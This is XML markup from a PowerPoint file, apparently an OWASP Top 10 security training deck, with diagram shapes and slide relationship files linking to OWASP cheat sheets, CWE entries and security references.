                </a:schemeClr>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="1">
                <a:schemeClr val="accent1"/>
              </a:lnRef>
              <a:fillRef idx="2">
                <a:schemeClr val="accent1"/>
              </a:fillRef>
              <a:effectRef idx="1">
                <a:schemeClr val="accent1"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:schemeClr val="dk1"/>
              </a:fontRef>
            </p:style>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="950" b="1" dirty="0">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  Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="950" b="1" dirty="0">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  Vectors</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879477" y="1063543"/>
                <a:ext cx="1020368" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:style>
              <a:lnRef idx="1">
                <a:schemeClr val="accent1"/>
              </a:lnRef>
              <a:fillRef idx="2">
                <a:schemeClr val="accent1"/>
              </a:fillRef>
              <a:effectRef idx="1">
                <a:schemeClr val="accent1"/>
              </a:effectRef>
              <a:fontRef idx="minor">
                <a:schemeClr val="dk1"/>
              </a:fontRef>
            </p:style>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="950" b="1" dirty="0">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      Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="950" b="1" dirty="0">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br>
                <a:r>
                  <a:rPr lang="en-US" sz="950" b="1" dirty="0">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      Weakness</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="23" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2005013" y="1253973"/>
                <a:ext cx="838922" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="sysDot"/>
                <a:miter lim="800000"/>
                <a:headEnd type="oval" w="sm" len="sm"/>
                <a:tailEnd type="oval" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="22" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="683695" y="1253973"/>
                <a:ext cx="453600" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="sysDot"/>
                <a:miter lim="800000"/>
                <a:headEnd type="oval" w="sm" len="sm"/>
                <a:tailEnd type="oval" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1051200"/>
              <a:ext cx="220306" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 47538"/>
                <a:gd name="adj2" fmla="val 51293"/>
                <a:gd name="adj3" fmla="val 57006"/>
                <a:gd name="adj4" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="2">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="dk1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2883600" y="1195200"/>
              <a:ext cx="92320" cy="95140"/>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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="35" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3899845" y="1241999"/>
              <a:ext cx="1562400" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="800000"/>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6809136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9489718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3" r:id="rId1"/>
    <p:sldLayoutId id="2147483674" r:id="rId2"/>
    <p:sldLayoutId id="2147483662" r:id="rId3"/>
  </p:sldLayoutIdLst>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creativecommons.org/licenses/by-sa/4.0/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><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hyperlink" Target="http://creativecommons.org/licenses/by-sa/4.0/" TargetMode="Externa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hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/311.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/PBKDF2" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V10_Communications" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V9_Data_Protection" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_weak_Cryptography" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/User_Privacy_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V7_Cryptography" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cryptolux.org/index.php/Argon2" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_XML_Injection_(OTG-INPVAL-008)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.ioactive.com/2014/11/die-laughing-from-billion-laughs.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/611.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web-in-security.blogspot.tw/2014/11/detecting-and-exploiting-xxe-in-saml.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/xml/xml_dtd_intro.asp" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secretsofappsecurity.blogspot.tw/2017/01/saml-security-xml-external-entity-attack.html" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Access_Control_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Authorization" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/284.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/388.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/16.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.websecurify.com/2017/10/aws-s3-bucket-discovery.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-123/final" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V19_Configuration" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/cis-benchmarks/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00200308_clientsidetemplateinjection" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://speakerdeck.com/pwntester/friday-the-13th-json-attacks" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide14.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://speakerdeck.com/pwntester/surviving-the-java-deserialization-apocalypse" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://frohoff.github.io/appseccali-marshalling-pickles/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mbechler/marshalsec" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/502.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Deserialization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/cschneider4711/surviving-the-java-deserialization-apocalypse-owasp-appseceu-2016" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/research-presentations/the-unfortunate-reality-of-insecure-libraries" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rubysec.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Heartbleed" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodesecurity.io/advisories" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/retirejs/retire.js/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shodan.io/report/89bnfUyJ" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Map_Application_Architecture_(OTG-INFO-010)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Internet_of_things" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Dependency_Check" TargetMode="External"/><Relationship Id="rId19" 